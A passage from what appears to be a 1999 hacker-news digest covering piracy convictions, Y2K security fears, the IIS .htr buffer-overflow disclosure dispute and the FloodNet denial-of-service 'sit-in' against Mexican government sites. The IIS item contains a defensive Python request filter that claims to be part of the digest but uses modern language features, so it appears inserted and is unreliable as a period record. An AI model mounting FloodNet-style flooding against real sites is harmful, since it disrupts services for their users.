MacCentral contacted the Microsoft Macintosh Business Unit at Microsoft, and Product Manager Irving Kwong confirmed the problem. He says Outlook Express doesn't encrypt mail data stored in the application - but that the problem isn't unique to Microsoft's free email application. "Encryption functionality of mail data does not exist in any free Macintosh email application, as this level of security is best executed at the operating system level," Kwong says. "Outlook Express' password protection between multiple users on the same computer is not secure. The password merely acts as a padlock on users' personal preferences."

So what is a secure solution? Kwong says it's coming with the next release of the Mac OS, codenamed Sonata. "You may remember Sonata's new multiple user environment being demonstrated at the WWDC," Kwong says (check out our story at http://www.maccentral.com/news/9905/10.sherlock.shtml). "We have been working on support for Sonata's multi-user functionality for Outlook Express and demonstrated this technology at the WWDC. This is the first offering of system-level security for multiple users sharing a Macintosh and is the best solution for true support, as it ensures password and data security. For Outlook Express customers and Macintosh users looking for a password secure solution for multiple users sharing a computer, we suggest using the upcoming version of Outlook Express with Sonata. The combination of Outlook Express and Sonata is a secure solution for Macintosh users doing email from the same computer." Sonata is due in the second half of the year.

@HWA

46.0 Major Pirates Convicted
     ~~~~~~~~~~~~~~~~~~~~~~~

June 16th 1999

From HNN http://www.hackernews.com/

contributed by Warez Dude

Texan Convicted of Pirating $63mil, in Germany.
A German State court has sentenced a Texas man to four years in prison for three counts of counterfeiting Microsoft programs. Microsoft said that this case was the "biggest in terms of the operation's sophistication and the magnitude of damage."

Nando Times http://www.techserver.com/story/body/0,1634,60053-95659-682086-0,00.html
Wired http://www.wired.com/news/news/politics/story/20239.html
ZD Net http://www.zdnet.com/zdnn/stories/news/0,4586,2276234,00.html

Father and Son, Busted.

Father and son were convicted in Massachusetts of conspiring to sell $20 million in stolen Microsoft Software. The father was fined over $1 Million and sentenced to almost six years in jail; the son was fined $100,000 and got ten months in jail.

Nando Times http://www.techserver.com/story/body/0,1634,60069-95685-682199-0,00.html

Nando Times; Texan convicted of software piracy in Germany
Copyright © 1999 Nando Media
Copyright © 1999 Associated Press

AACHEN, Germany (June 15, 1999 3:33 p.m. EDT http://www.nandotimes.com) - A German state court convicted John-Joseph Staud, a Texas man, on Tuesday of counterfeiting more than $63 million worth of Microsoft computer programs. Staud, 39, was sentenced to four years in prison for three counts of counterfeiting patented programs and smuggling them into Germany for commercial purposes. Microsoft Corp. greeted the court's decision as "a meaningful signal" toward thwarting computer piracy. The software giant, based in Washington state, said the counterfeit case was its biggest in terms of the operation's sophistication and the magnitude of damage. The court denied Microsoft's request for damages, saying that should be handled by a court in England, where Staud allegedly ran a counterfeit compact disc production plant and printing operation. He also faces charges in England.
Charges against Staud stemmed from a German customs office investigation last August that uncovered 300,000 counterfeited CD-ROMs with programs such as MS Office, Windows 95, and Windows NT, along with 400,000 installation handbooks. The materials, which had been smuggled into Germany, were found in a rented container and a warehouse in the town of Kreuzau, about 20 miles east of Aachen, which is located on the border with Belgium. -=- Wired; Germany Jails Software Pirate Reuters 4:30 p.m. 15.Jun.99.PDT A German court sentenced an American man to four years in prison without probation Tuesday for importing illegally copied Microsoft computer software. It was the first time Germany has issued a prison sentence in a crime involving software piracy, Microsoft (MSFT) said. "The 39-year-old Texan was sentenced today for four years without probation," a spokesman for the German regional court of Aachen said. The sentencing of the man, identified only as John S., follows the seizure by German customs officials of thousands of illegal copies of Microsoft software programs and manuals last August. Microsoft said fraud was proved in several instances in the case, with total damages amounting to about 120 million marks (US$64 million). "This sentence is a breakthrough in Germany and shows that counterfeiting software is really a serious crime," Rudolf Gallist, general manager of Microsoft GmbH, said in a statement. - - - More MS Software Pirates Jailed: Three more defendants in the "Crazy Bob's" stolen software ring were sentenced this week, federal prosecutors said Thursday. The three are the latest to be sentenced for their part in a conspiracy to sell US$20 million in Microsoft Corp. software stolen from a Massachusetts disc manufacturer. 
Marc Rosengard, an employee of Crazy Bob's discount computer shop in Wakefield, Mass., was sentenced on Thursday to 33 months in prison and three years supervised release, and must pay $20,000 in restitution to Microsoft, prosecutors said.

Another defendant, Maxine Simons, 59, was sentenced on Wednesday by US District Court Judge George O'Toole to two years and nine months in prison and ordered to pay restitution of $908,000, prosecutors said.

Her husband Robert Simons, who ran Crazy Bob's, was given a 70-month prison sentence on Tuesday. Their son, William Simons, was sentenced to one year and 10 months on Tuesday.

Also sentenced on Wednesday was Gerald Coviello, 62, to two years and six months in prison. Maxine Simons and Coviello were convicted of conspiracy to transport stolen property following a three-week jury trial in March.

Among other misdeeds, Crazy Bob's was accused of buying and reselling 32,000 stolen copies of Microsoft Office 97 Professional Edition. Worth $599 apiece, they were acquired from rogue former employees of KAO Infosystems of Plymouth, Massachusetts, which manufactured the discs.

Copyright© 1999 Reuters Limited.

-=-

Nando Times #2

Sellers of $20 million of stolen software sentenced to prison

Copyright © 1999 Nando Media
Copyright © 1999 Reuters News Service

BOSTON (June 15, 1999 4:04 p.m. EDT http://www.nandotimes.com) - A father and son pair accused of conspiring to sell more than $20 million in Microsoft Corp. software stolen from a Massachusetts manufacturer were sentenced to prison, prosecutors said Tuesday.

Robert Simons, 62, who ran Crazy Bob's discount software store in Wakefield, Massachusetts, was sentenced to five years and 10 months imprisonment by U.S. District Judge George O'Toole Monday. Simons was also ordered to pay $908,000 in restitution to Microsoft and to forfeit $440,000 to the federal government.
His son, William Simons, 35, a Crazy Bob's salesman, was sentenced to one year and 10 months in prison, and must pay $100,000 to Microsoft, prosecutors said.

Crazy Bob's was accused of buying millions of dollars worth of computer discs stolen from KAO Infosystems, a disc manufacturer in Plymouth, Massachusetts, by two ex-KAO workers. The two former KAO employees pleaded guilty to related charges and were awaiting sentencing, prosecutors said.

Among other misdeeds, the Simons were accused of buying 32,000 stolen copies of Microsoft Office 97 Professional Edition, worth $599 apiece, and reselling them to CD-ROM outlets in California and Great Britain, prosecutors said.

@HWA

47.0 Fear of Y2K Raises Security Concerns
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

June 16th 1999

From HNN http://www.hackernews.com/

contributed by roach

Australia Concerned Over Y2K and Security

Fears that the Y2K bug will cause weaknesses in computer security are being raised. Some companies are spending money on Y2K issues and are ignoring important security issues. The fear is that cyber attacks may be misinterpreted as run of the mill Y2K problems.

Australia News
http://technology.news.com.au/techno/4297150.htm
Australian Financial Review
http://www.afr.com.au/content/990615/update/update38.html

DOD Plans for Possible Y2K Attack

The US DOD has started evaluating possible scenarios for cyber attacks that may be masquerading as Y2K computer glitches. While not saying how possible such an attack may be, DOD said it is just being prepared for any contingency.

Federal Computer Week
http://www.fcw.com:80/pubs/fcw/1999/0614/web-cybery2k-6-15-99.html

Australian News; Bug scare aids cyber terror

By STEFANIE BALOGH
16jun99

THE Y2K bug has left computer systems around the world vulnerable to cyber terrorist attacks when the new millennium dawns, an international computing expert warned yesterday.
Constance Fortune, vice-president of Canada's Science Applications International Corporation, said because companies had focused resources on Y2K compliance, they had left their operations open to other security risks.

Speaking at the 11th FIRST (Forum for Incident Response Security Team) computer security conference in Brisbane, Ms Fortune said amateur hackers and cyber criminals were poised to wreak havoc on New Year's Day and beyond.

She predicted the problems could be more disastrous than any virus because multinational and government computer systems would be at their weakest.

"Those who create viruses, worms and other destructive computer phenomena have found ways to take advantage of the Y2K problem," she warned.

Ms Fortune said it was crucial for computer emergency response teams to be able to determine whether system failure was the result of Y2K problems or camouflaged security attacks.

Ms Fortune also said northern hemisphere firms would closely watch as Australia embraced the millennium, hours before the US, Europe and Britain.

"What happens in Australia as 2000 rolls in will provide us with a much-appreciated early warning of what we can expect only hours later," she said.

Her warnings were echoed by information technology security expert Bill Caelli, who predicted the security problems caused by companies focusing on Y2K compliance could continue for 12-18 months.

Professor Caelli, from the Queensland University of Technology, also said business and government had "lost 20 years" of work on computer security because they were more interested in cost-cutting.

He also called for the Australian Government to introduce tougher legislation to force companies to upgrade information security and for the Government to end the practice of outsourcing its IT capabilities.

-=-

Federal Computer Week;
JUNE 15, 1999 . . .
16:33 EDT

DOD preps for possible cyberattacks brought on by Y2K

BY BOB BREWIN (antenna@fcw.com)

The Pentagon has started to develop plans that would shut back doors that hook its global networks to the Internet in case cyberfoes try to use any Year 2000 computer date code snafus to mount a cyberattack.

Marvin Langston, deputy assistant secretary of Defense for command, control communications and intelligence, declined to estimate the possibility of such a cyberassault. He said the Pentagon has started to develop contingency plans to protect its networks at the end of the year in case "cyberattackers try to mask themselves in the confusion."

"We want to be able to close down our back doors," said Langston, speaking at GovTechNet, a Washington, D.C., conference sponsored by FCW and the Armed Forces Communications and Electronics Association.

Langston said hacker Web sites and discussion groups have mentioned seizing the opportunity to launch cyberattacks against DOD by using any computer or network that may be malfunctioning because of Year 2000 problems. DOD "has to be prepared to deal with it," Langston said.

-=-

@HWA

48.0 Israeli Banks Thwart Attempted Cyber Break-In
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

June 16th 1999

From HNN http://www.hackernews.com/

contributed by LirA

Buried down in the fifth paragraph is a statement by Bank of Israel Supervisor of Banks Dr. Yitzhak Tal, who claims that the Israeli banking system has been the target of "primitive and insignificant" cyber attacks.

Israel's Business Arena
http://www.globes.co.il/cgi-bin/Serve_Archive_Arena/pages/English/1.2.1.20/19990614/1

Tuesday , Jun 15, 1999 Sun-Thu at 18:00 (GMT+2)

Headlines

Tal: Hackers Tried to Break Into Internet Banking Services

By Zeev Klein

Bank of Israel Supervisor of Banks Dr. Yitzhak Tal is opposed to mergers between large banks, because the Israeli banking system is still too centralist.
Briefing economic correspondents yesterday upon the publication of the annual banking system report for 1998, Tal said, "It’s impossible to draw comparisons between Israel and the US or Europe. There, too, it’s still not clear what’s the cause for bank mergers. We’re different from them, and we must be more careful."

According to Tal, mergers between small banks are not really beneficial. "I’m in favor of mergers between small banks, and against mergers between big banks. But a small bank plus a small bank gives yet another small bank," Tal said.

As for mergers between medium-size banks, Tal said that the issue is under examination by the Bank of Israel. He stressed, however, that "at the moment we’re not faced with any specific request on which we must take a decision. We are rather seeking to work out our position in principle on the issue. There are arguments both ways. On the one hand, mergers between medium-size banks will increase the centralism of the system, which is very considerable as it is. On the other hand, it may well be that a new banking player that would compete with the large banks will enhance competitiveness. Our key consideration is improving competition, rather than stability," Tal said.

Referring to the expansion of Internet banking services, Tal said, "We don’t have to be the trail blazers on Internet worldwide. We must be cautious, and see how this area develops throughout the world."

Tal disclosed that hackers had recently attempted to break into the Internet banking system, but added that the efforts were primitive and insignificant, and did not result in any real damage to customers or to the banks.

Tal did not expect any Y2K-related massive malfunction that might wipe out public deposits. According to him, "Public deposits aren’t going to be virtually wiped out." Tal added that the banks are taking the proper measures to cope with Y2K.
Published by Israel's Business Arena June 14, 1999

@HWA

49.0 Navy Wants Tighter Network Security
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

June 16th 1999

From HNN http://www.hackernews.com/

contributed by Lif3r

The US Navy is looking into adding real-time intrusion detection capabilities into its network defenses.

Federal Computer Week
http://www.fcw.com:80/pubs/fcw/1999/0614/web-navy-6-15-99.html

JUNE 15, 1999 . . . 12:55 EDT

Navy looks to upgrade network security

BY DIANE FRANK (diane_frank@fcw.com)

As part of its overall security strategy, the Navy is looking at several new auditing products that can offer real-time intrusion detection.

The Navy is using the auditing and other security features that are part of Microsoft Corp.'s Windows NT and variations of the Unix operating system. But the Navy can only use that technology to find out about intrusions into a network after the fact, Cmdr. Larry Downs, director of operations for the Navy Fleet Information Warfare Center, said today at the GovTechNet conference in Washington, D.C.

Companies recently have released several products that will enable Navy network administrators to learn about intrusions and attacks as the attacks occur. The Navy is interested in incorporating the products into its network security, Downs said.

"The Navy is looking closely at this and will probably look to buy in the very near future," he said.

@HWA

50.0 IIS Hole Continues to Make News/Fix Available
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

June 17th 1999

From HNN http://www.hackernews.com/

contributed by Marc

The major hole publicly announced yesterday by eEye Digital Security Team in Microsoft's Internet Information Server is continuing to make news.

Internet News
http://www.internetnews.com/prod-news/article/0,1087,9_139231,00.html
ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2277295,00.html

eEye Releases Fix

Microsoft has issued a workaround for this bug, however it does break functionality such as /iisadmpwd/.
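As an added illustration of the defensive idea in this item, here is a small request filter, written for this digest and not code from eEye or Microsoft, that refuses .htr requests whose request target exceeds a length cap and records the source address of anything it refused. The 200-character cap, the sample request lines and the 192.0.2.x addresses are all constructed for the example.

```python
"""Length-capping front door for .htr requests (added example, not eEye's or
Microsoft's code). The idea: before a request reaches an ISAPI extension
that cannot safely handle long input, refuse anything over a size cap and
log where it came from."""
from dataclasses import dataclass
from typing import List, Optional, Tuple
from urllib.parse import urlsplit

# Constructed assumption for this example: the longest request target
# an .htr request is allowed to carry (path plus query string).
MAX_HTR_TARGET_LEN = 200


@dataclass
class Decision:
    allowed: bool
    reason: str
    log_line: Optional[str] = None   # set only when the request is refused


def is_htr_request(target: str) -> bool:
    """True when the path part of the request target ends in .htr.

    The query string is stripped before the check and the comparison is
    case-insensitive, so /x.HTR?... is treated the same as /x.htr."""
    return urlsplit(target).path.lower().endswith(".htr")


def check_request(request_line: str, client_ip: str,
                  limit: int = MAX_HTR_TARGET_LEN) -> Decision:
    """Apply the cap to one HTTP request line ("METHOD target HTTP/x.y")."""
    parts = request_line.split(" ")
    if len(parts) != 3:
        return Decision(False, "malformed request line",
                        f"DENY malformed request from {client_ip}")
    method, target, _version = parts
    if not is_htr_request(target):
        return Decision(True, "not an .htr request")
    # The whole target is measured, query string included, because the
    # over-length input can arrive in either part of the request.
    if len(target) > limit:
        log = (f"DENY over-length .htr request ({len(target)} > {limit}) "
               f"from {client_ip}: {method} {target[:40]}...")
        return Decision(False, ".htr request exceeds length cap", log)
    return Decision(True, ".htr request within cap")


# Constructed sample traffic: two ordinary requests, one over-length path,
# one over-length query string on an upper-case extension.
SAMPLE_REQUESTS: List[Tuple[str, str]] = [
    ("GET /default.htm HTTP/1.0", "192.0.2.10"),
    ("GET /iisadmpwd/aexp.htr HTTP/1.0", "192.0.2.11"),
    ("GET /" + "A" * 600 + ".htr HTTP/1.0", "192.0.2.12"),
    ("GET /x.HTR?" + "B" * 300 + " HTTP/1.0", "192.0.2.13"),
]


def refused_log_lines(samples=SAMPLE_REQUESTS) -> List[str]:
    """Run the filter over the samples and return the log lines it produced."""
    return [d.log_line
            for d in (check_request(line, ip) for line, ip in samples)
            if not d.allowed]


if __name__ == "__main__":
    for entry in refused_log_lines():
        print(entry)
```

The filter measures the whole request target, query string included, and matches the extension case-insensitively, because a check that only inspects a lower-cased path leaves the part of the request it does not examine unchecked. A cap like this is a stopgap for the window between disclosure and patch; the durable fix remains the vendor patch or removing the mapping for an extension the server does not need.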
eEye Digital Security Team has released their own fix that resolves the problem and preserves functionality. It limits .htr requests to 200 characters, and logs the IP address of the person trying the overflow. This is a great deal better than the current recommendation from Microsoft, which is to just remove the .htr ISAPI filter.

eEye Digital Security Team
http://www.eeye.com/database/advisories/ad06081999/ad06081999-ogle.html
Microsoft
http://www.microsoft.com/security/bulletins/ms99-019.asp

CERT Advisory Released

A day late and a dollar short, CERT (Computer Emergency Response Team) has released an advisory concerning this major problem. Unfortunately they forgot to credit who found the problem.

CERT
http://www.cert.org/advisories/CA-99-07-IIS-Buffer-Overflow.html

Irresponsible Security Companies

This article on C|Net questions whether eEye did the right thing by releasing their advisory before Microsoft was ready with their patch. A quote in the article from a Microsoft representative called this "contrary to all of the normal rules of responsible security professionals."

[rant on] Bullshit. The company that has shown the public how irresponsible they are is Microsoft. Microsoft knew about this problem for a week but did nothing until it was released to the public. It is extremely likely that someone else found this hole and did not tell anyone. They could have used this problem to install back doors on most of the servers in the world without anyone knowing. Microsoft could have stopped this action a week earlier and didn't. Microsoft is the one who is not acting like a 'responsible security professional'. [/rant off]

C|Net
http://www.news.com/News/Item/0,4,37949,00.html?st.ne.fd.mdh.ni

C|Net; Microsoft server bug wrongly publicized?

By Stephanie Miles, Stephen Shankland, and Wylie Wong
Staff, CNET News.com
June 16, 1999, 6:50 p.m.
PT

Microsoft offered a temporary fix for a problem with its Web server software that lets attackers "inject" a program that can run on a Windows NT-based system. In the meantime, the manner in which the bug was reported and publicized is generating controversy.

The bug attacks Internet Information Server, Microsoft's software for serving up Web pages. Putting the right type of malicious code into a page request can cause IIS to crash, or worse, let an attacker run whatever programming code he wants.

Firas Bushnaq, CEO of Eeye, today accused Microsoft of dragging its feet to solving the problem. His company alerted Microsoft on June 8, he said, but Microsoft told him to keep quiet about it. Bushnaq said he went public yesterday because he felt Microsoft wasn't doing anything to resolve the issue.

But Bushnaq didn't stop at just publicizing the bug, and that's where the controversy comes in: EEye posted a program that will exploit the weakness, a move Microsoft says runs contrary to established procedures for reporting and patching bugs.

Not surprisingly, Microsoft disputes Bushnaq's version of the story.

"You can send a 'malformed' or very long request to a Web server. It could cause a buffer overflow, which means you can embed application code that will execute on the server," Bushnaq explained of the bug.

"Anything that is residing on the Web server and everything connected to that--back-end databases, e-commerce information, credit card information--could be accessible," he continued. "It is extremely important for people to fix it."

"We've got a security response process that we set up a year ago so that customers would have a place to report bugs and so that we could respond to it quickly," countered Scott Culp, a security product manager for Microsoft. No confirmed problems occurring as a result of the bug have been reported, he said.

"For reasons we don't understand, at the beginning of this week they [Eeye] suddenly went public with the bug.
It's contrary to all of the normal rules of responsible security professionals," he said. "You don't provide tools that malicious users can use to hurt innocent people."

Microsoft rushed to post a workaround to the problem, but a true fix to patch the bug is not yet available. The workaround will protect users from malicious or arbitrary code, Culp said.

"We're completing the patch right now, but we need to make sure that we've fully tested it. In the meantime, nobody needs to be vulnerable because of the workaround," he said.

@HWA

51.0 World Braces for International Day of Action
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

June 17th 1999

From HNN http://www.hackernews.com/

contributed by barbie

Officials in Australia and around the world are bracing for International Day of Action on June 18th, known as J18. June 18 is also the same day as the G8 meeting in Cologne, Germany. J18 organizers are calling for disruption of financial centers, banking districts and multinational corporate power bases. Examples of possible activities include picketing, street parties, leafleting, rallies, marches, strikes, carnivals, and of course 'hacking'.

Australian Financial Review
http://www.afr.com.au/content/990616/update/update37.html

Australian Financial Review - Yes, there are two stories

J18 hackers 'could target Australia' on Friday

Australian companies could be targeted by computer hackers this Friday as part of an international day of action against big business, a computer security conference was told today.

But for those companies without adequate computer security, it may be too late to bolster defences, Byron Collie, from Australian Federal Police's national computer crime team said.

Mr Collie told the conference the international day of action on Friday, known as J18, could include cyberattacks on business and banking computer networks.

The J18 action coincides with the G8 meeting in Cologne, Germany.
The official J18 site on the Internet calls for people to plan individual "actions" focusing on disrupting "financial centres, banking districts and multinational corporate power bases".

"It is up to the groups themselves to decide what to do on the day," it says. "Examples could include picketing, street parties, leafleting, rallies, marches, strikes, carnivals, hacking, blockades, whatever."

Mr Collie said there was a growing trend for computer hacking to be politically motivated and for a number of hackers to work in cooperation.

"Motivation for these (hacking) activities have changed slightly from the usual teenage intruder-type activity," he told the Computer Security Incident Handling and Response conference. "There's a lot more political and issue motivated activities."

Mr Collie said one example of "hacktivism" occurred during the Kosovo conflict when a Serbian computer expert distributed an e-mail calling for all Serbs throughout the world to launch a concentrated cyberattack on the computer systems of NATO countries.

Late last year, as Indonesia was preparing for its elections, hackers shut down an East Timorese website based in Ireland, he said.

"I would hope that you have every measure already in place," he told the conference delegates.

AAP

@HWA

52.0 ECD Targets Mexican Government
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

June 17th 1999

From HNN http://www.hackernews.com/

contributed by stealth

The people at Electronic Civil Disobedience are planning a virtual 'sit-in' in protest of the treatment of the Zapatistas by the Mexican government. The sit-in will basically be a DoS attack against several Mexican government internet sites. This demonstration is planned to take place on June 18 from 10:00am to 4:00pm Mexico City time.
Electronic Civil Disobedience
http://www.thing.net/~rdom/ecd/ecd.html

The June 18th Sit-in report from ECD
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

JUNE 18: THE VIRTUAL AND THE REAL
ACTION ON THE INTERNET AND IN AUSTIN, TEXAS
ZAPATISTA FLOODNET AND RECLAIM THE STREETS

by Stefan Wray, June 19, 1999, 6:00 CDT

"The resistance will be as transnational as capital."

On June 18, 1999, simultaneous with the G8 meeting in Koln, Germany, people all over the world participated in actions and events under the banner "Reclaim The Streets." Email reports coming in today indicate that 10,000 people gathered in Nigeria and that San Francisco drew crowds of around 500. More news and reports of events will surely be posted in the coming days. What follows is a contribution to this emerging body of material.

Reclaim the Streets European Headquarters
http://www.gn.apc.org/rts/

Below are two separate and very different reports. The first describes the results of the virtual sit-in called by the Electronic Disturbance Theater opposing the Mexican government that involved thousands of people from 46 countries. The second is a longer narrative account describing events as they unfolded in Austin, Texas, an action that involved about 50 people and resulted in three arrests. It ends with some comments on hybridity, meshing the virtual and the real.

THE VIRTUAL

On June 15, the Electronic Disturbance Theater began sending out email announcements urging people to join in an act of Electronic Civil Disobedience to stop the war in Mexico. The call made in conjunction with the Reclaim The Streets day of action was intended to introduce a virtual component to the numerous off-line actions happening all over the world. But a strong motivation for the action was also due to the fact that in recent weeks there has been a significantly higher level of government and military harassment of Zapatista communities in Chiapas, with reports indicating as many as 5,000 Zapatistas have fled their communities.
The suggested action was for people using computers to point their Internet browser to a specific URL during the hours of 4:00 and 10:00 p.m. GMT. By directing Internet browsers toward the Zapatista FloodNet URL, during this time period, people joined a virtual sit-in. What this meant was that their individual computer began sending re-load commands over and over again for the duration of the time they were connected to FloodNet. In a similar way that people were out in the streets, clogging up the streets, the repeated re-load command of the individual user - multiplied by the thousand engaged - clogged the Internet pathways leading to the targeted web site. In this case on June 18, FloodNet was directing these multiple re-load browser commands to the Mexican Embassy in the UK. (http://www.demon.co.uk/mexuk)

The results of the June 18 Electronic Disturbance Theater virtual sit-in were that the Zapatista FloodNet URL received a total of 18,615 unique requests from people's computers in 46 different countries. Of that total, 5,373 hits on the FloodNet URL - 28.8 percent - came from people using commercial servers in the United States - the .com addresses. People using computers in the United Kingdom accounted for the second largest number of participants, 3,633 or 19.5 percent. People with university accounts in the U.S., 1,677 of them, made up the third largest category of participants at 9.0 percent. Interestingly, the fourth largest category of participants came from .mil addresses, from the U.S. military, for which there were 1,377 hits on the FloodNet URL, at 7.4 percent. Included among the military visitors were people using computers at DISA, the Defense Information Systems Agency.

[In the same way that police help to block the streets when they show up at a demonstration, the military and government computer visitors to the FloodNet URL inadvertently join the action.]
And the fifth largest group of participants were from Switzerland with 1,276 or 6.8 percent. The remaining 5,329, or 28.6 percent, of global participants in the June 18 virtual sit-in came from all continents including 21 countries in Europe (Austria, Belgium, Czech Republic, Denmark, Estonia, Finland, France, Germany, Greece, Hungary, Ireland, Italy, Lithuania, Macedonia, Netherlands, Norway, Poland, Portugal, Spain, Sweden and Yugoslavia), 7 countries in Latin America (Argentina, Brazil, Chile, Colombia, Mexico, Peru and Uruguay), 6 countries in Asia (Indonesia, Japan, Malaysia, Singapore, South Korea and Taiwan), 5 in the Middle East (Bahrain, Israel, Qatar, Saudi Arabia and Turkey), Australia and New Zealand, Canada, Georgia (former Soviet Union), and South Africa.

The global Zapatista FloodNet action on June 18 is the first that the Electronic Disturbance Theater called for in 1999. The group began in the spring of 1998 and launched a series of FloodNet actions directed primarily against web sites of the Mexican government, but action targets also included the White House, the Frankfurt Stock Exchange, the Pentagon. The highlight was in September when the group showcased FloodNet at the Ars Electronica festival on Information Warfare in Linz, Austria. At that time one of the targets of FloodNet was a U.S. Department of Defense web site. This action is noteworthy because of a Pentagon countermeasure, since it may be one of the first known instances in which the DOD has engaged in an offensive act of information warfare against a domestic U.S. target - an act some say could have been illegal.

More details on the Electronic Disturbance Theater can be found at:
http://www.thing.net/~rdom/ecd/ecd.html

THE BEGINNING OF THE REAL

I turned off my computer, moved away from the screen, and left work at 5:00. My girlfriend picked me up in the car and we passed by the bank so I could cash my paycheck. Good thing too. My balance had literally been 99 cents.
Then we drove to the radio station, KOOP, where we do a half-hour news program every Friday. It was hot inside the station, as it was outside. But the studio was nice and cool, so we sat there and waited for the Working Stiff show to end and the news to begin. We listened to John do a phone interview with someone from the pipe-fitters union. They were talking about a strike.

We started off the news with a long piece from A-Infos about the World Trade Organization. It was a decent article but a bit too long to read on the air. The piece ended with a call for people to travel to Seattle later in the year to oppose the third WTO ministerial conference.

After the news we walked over to join a handful of IWW folks who put out the Working Stiff Journal. They were at Lovejoys, a bar with a decent selection of beer just off 6th Street. I started talking to a few friends about the war in Yugoslavia and an idea I'd had that it might be good to form a focus group on the history, present, and future of war. The idea being that the left doesn't really understand war anymore, or rather, that the left is using the same techniques to oppose war that it used 30 years ago, but that the way wars are fought has changed. The few who I talked to supported the idea and had some good suggestions.

RUTA MAYA

After swilling down a few pints, at around 7:30, my girlfriend and I left Lovejoys and drove over to Ruta Maya. All I knew was that the Critical Mass bike ride was to end up there. And the ride was Austin's effort to be part of the global Reclaim The Street actions that were happening all over the world.

Ruta Maya is a coffee shop in downtown Austin's warehouse district. They import coffee from Chiapas. Local activist groups often stage benefits and events there.

When we got to Ruta Maya people from the bike ride were already filtering in. They had started the ride up by the university. I wasn't on the ride so I only heard snapshots of what had happened.
But I learned that a few had spent the previous night working on some stickers that said, "Closed" and "Out of Order." These were to put on ATM machines and other relevant symbols of capital. The ride passed by the Gap. For a moment Gap workers were harassed for selling clothes manufactured in sweatshops.

The crowd inside and outside on the elevated sidewalk was a mix of Ruta Maya regulars, people who came to hear an acoustic guitarist playing inside, customers of Ruta Maya's cigar shop, anyone who happened to be walking by, and of course the cyclists from the Critical Mass/RTS ride.

First I talked to some people involved in Free Radio Austin, a local micropower radio station shut down by the FCC a few weeks ago - which is incidentally scheduled to go back on the air today. We didn't talk about that, but about some of the problems with a new space here called Pueblos Unidos. A long story, but basically there is a power struggle among the original tenants of this allegedly collective warehouse space on the eastside of Austin. Too complicated to go into here. Conversations about Pueblos Unidos, the Grassroots News Network, and Point A threaded through the evening.

The riders included people I've known from Earth First!, from the local bicycle activist scene, and a whole new set of folks from Point A who I don’t really know. I just thought that Ruta Maya was a gathering point after the ride was finished. But it turned out to be something else.

THE STREET

After not long, some people started talking about how to encourage others to start standing out in the street in front of Ruta Maya. People had just finished the ride and were all charged up with energy. A moment later, two young riders were moving a construction barricade and a few orange cones into the lane of traffic coming from the west. While at the other end of the block a group took similar barricades and placed them to stop traffic coming from the east.
And then, one at a time, people started leaving the sidewalk or leaving the edges of the street to stand out in the middle. For a little while there were just about 10 people. A few standing near the barricade. A few more down at the other end of the street. And more starting to filter out right in front of Ruta Maya.

I actually hadn't anticipated this. I wanted to sit down so I asked someone to pass me down a chair from the elevated sidewalk. I sat on the chair in the middle of one lane. Someone else picked up another chair and sat down near me. With barricades on both ends of the block, people sitting in chairs, cars lurching forward slowly and trying to get out, others in Ruta Maya started to take notice, and those less inclined to be the first ones to venture out into the street, followed.

A Ruta Maya worker came out and said that he needed his chair back. I didn't argue. Ruta Maya is a cool place. And by sitting there momentarily it had served to encourage a few more to join.

Soon there were people in both lanes of traffic out in front of Ruta Maya. At its peak maybe there were as many as 50. Not a huge crowd. Enough to reclaim the street - temporarily. But not enough to remain once the police started to arrive. And of course they did.

But before the police showed up, a few of the people whose idea it was to reclaim this particular section of street spoke loudly and explained what Reclaim The Streets was all about. Small flyers titled "Whose City Is This Anyway?" were passed out. And people started doing a "cheer" of sorts. Lacking were drums or other instruments that are always good for stirring up a crowd.

THE POLICE

I first noticed a brown shirted Sheriff's deputy get out of a sports utility vehicle. But he simply walked by, seemingly oblivious to what was happening. Soon thereafter the bike cops showed up. Like a number of urban police forces in the U.S., Austin has its police-on-bicycle contingent, mostly used for patrolling the busy downtown area.
The bike cops started to move around the crowd and address people whom they thought might be leaders. I was actually standing with my back turned, talking to a friend, when one bike cop came up to us. Maybe because I was smoking a cigar he thought I was a 'revolutionary leader'. (Just kidding.) Anyway, the bike cop said to us, "I'm contacting my supervisor and if you aren't out of the street in ten minutes, we are going to start making arrests."

I told the bike cop that I wasn't in charge. But anyway, my friend and I passed on this warning to a few others. So when the three police vans and the handful of marked and unmarked cars showed up - to inadvertently block the streets themselves - we were not surprised.

The three vans barreled down the road from the east and the marked and unmarked cars from the west, stopping right at the intersection of 4th and Lavaca. Obviously, given that there were not many of us and given that we had neither anticipated nor were we prepared to take a stand, we mostly filtered back off the street and onto the side. But there were a few who - for whatever reason - were not so content to give up the street that quickly.

Bike cops and regular police officers stood in the street in between the three vans and the rest of us on the side of the road. People were jeering at the cops. I didn't see exactly what happened - or what precipitated it - but in a flash a group of cops lunged forward and pulled someone from out of the crowd on the side, not even someone who was standing closer to the police, but someone behind another. And then another was arrested. And then a third.

People were yelling and screaming at the cops: "You fucking pigs!"; "Don't you have any real criminals to arrest"; "Whose street? Our street!"

They remained for awhile longer. Tensions quieted down. And the vans and the marked and unmarked cars drove off.

All through this, my girlfriend had been trying to call a few local media outlets.
She was at the payphone in front of Ruta Maya. At one point she told me she had got through to KXAN. But no media ever showed up. With the police gone, three of us on the way to jail, a number of the riders - who had only wanted to ride their bikes and not get involved with this mess - on their way out, the ones who had planned this Austin Reclaim The Street action bewilderedly consulted about how next to proceed. My girlfriend and I had both been arrested before and were quite familiar with the process. She knew the inside of Austin's jail and something about the procedure for getting out. She offered her advice to the younger activists and was ready to leave them to it. But I suggested maybe we ought to also go down to the police station to help sort things out. So we did.

THE POLICE STATION

